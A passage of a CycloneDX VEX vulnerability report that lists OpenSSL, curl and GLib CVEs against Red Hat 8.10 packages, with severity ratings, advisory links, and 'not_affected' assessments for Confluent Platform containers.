          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2023-2650",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        770
      ],
      "description": "Issue summary: Processing some specially crafted ASN.1 object identifiers or\ndata containing them may be very slow.\n\nImpact summary: Applications that use OBJ_obj2txt() directly, or use any of\nthe OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message\nsize limit may experience notable to very long delays when processing those\nmessages, which may lead to a Denial of Service.\n\nAn OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers -\nmost of which have no size limit.  OBJ_obj2txt() may be used to translate\nan ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL\ntype ASN1_OBJECT) to its canonical numeric text form, which are the\nsub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by\nperiods.\n\nWhen one of the sub-identifiers in the OBJECT IDENTIFIER is very large\n(these are sizes that are seen as absurdly large, taking up tens or hundreds\nof KiBs), the translation to a decimal number in text may take a very long\ntime.  The time complexity is O(n^2) with 'n' being the size of the\nsub-identifiers in bytes (*).\n\nWith OpenSSL 3.0, support to fetch cryptographic algorithms using names /\nidentifiers in string form was introduced.  This includes using OBJECT\nIDENTIFIERs in canonical numeric text form as identifiers for fetching\nalgorithms.\n\nSuch OBJECT IDENTIFIERs may be received through the ASN.1 structure\nAlgorithmIdentifier, which is commonly used in multiple protocols to specify\nwhat cryptographic algorithm should be used to sign or verify, encrypt or\ndecrypt, or digest passed data.\n\nApplications that call OBJ_obj2txt() directly with untrusted data are\naffected, with any version of OpenSSL.  If the use is for the mere purpose\nof display, the severity is considered low.\n\nIn OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME,\nCMS, CMP/CRMF or TS.  It also impacts anything that processes X.509\ncertificates, including simple things like verifying its signature.\n\nThe impact on TLS is relatively low, because all versions of OpenSSL have a\n100KiB limit on the peer's certificate chain.  Additionally, this only\nimpacts clients, or servers that have explicitly enabled client\nauthentication.\n\nIn OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects,\nsuch as X.509 certificates.  This is assumed to not happen in such a way\nthat it would cause a Denial of Service, so these versions are considered\nnot affected by this issue in such a way that it would be cause for concern,\nand the severity is therefore considered low.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-2650"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2023/05/30/1"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2023:6330"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-2650"
        },
        {
          "url": "https://bugzilla.redhat.com/1858038"
        },
        {
          "url": "https://bugzilla.redhat.com/2207947"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2023-6330.html"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a"
        },
        {
          "url": "https://github.com/advisories/GHSA-gqxg-9vfr-p9cg"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2023-2650.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2023-6330.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650"
        },
        {
          "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009"
        },
        {
          "url": "https://security.gentoo.org/glsa/202402-08"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230703-0001/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20231027-0009/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6119-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6188-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6672-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7894-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-2650"
        },
        {
          "url": "https://www.debian.org/security/2023/dsa-5417"
        },
        {
          "url": "https://www.openssl.org/news/secadv/20230530.txt"
        }
      ],
      "published": "2023-05-30T14:15:09+00:00",
      "updated": "2026-06-17T05:53:06+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2023-27534",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        22
      ],
      "description": "A path traversal vulnerability exists in curl <8.0.0 SFTP implementation causes the tilde (~) character to be wrongly replaced when used as a prefix in the first path element, in addition to its intended use as the first element to indicate a path relative to the user's home directory. Attackers can exploit this flaw to bypass filtering or execute arbitrary code by crafting a path like /~2/foo while accessing a server with a specific user.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-27534"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2023:6679"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-27534"
        },
        {
          "url": "https://bugzilla.redhat.com/2179062"
        },
        {
          "url": "https://bugzilla.redhat.com/2179069"
        },
        {
          "url": "https://bugzilla.redhat.com/2179092"
        },
        {
          "url": "https://bugzilla.redhat.com/2179103"
        },
        {
          "url": "https://curl.se/docs/CVE-2023-27534.html"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2023-6679.html"
        },
        {
          "url": "https://hackerone.com/reports/1892351"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2023-27534.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2023-6679.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/03/msg00016.html"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/36NBD5YLJXXEDZLDGNFCERWRYJQ6LAQW/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-27534"
        },
        {
          "url": "https://security.gentoo.org/glsa/202310-12"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230420-0012/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-5964-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-27534"
        }
      ],
      "published": "2023-03-30T20:15:07+00:00",
      "updated": "2026-06-17T05:45:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2023-29499",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        400
      ],
      "description": "A flaw was found in GLib. GVariant deserialization fails to validate that the input conforms to the expected format, leading to denial of service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-29499"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:2528"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-29499"
        },
        {
          "url": "https://bugzilla.redhat.com/2211827"
        },
        {
          "url": "https://bugzilla.redhat.com/2211828"
        },
        {
          "url": "https://bugzilla.redhat.com/2211829"
        },
        {
          "url": "https://bugzilla.redhat.com/2211833"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2211828"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2024-2528.html"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/2794"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2023-29499.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2024-2528.html"
        },
        {
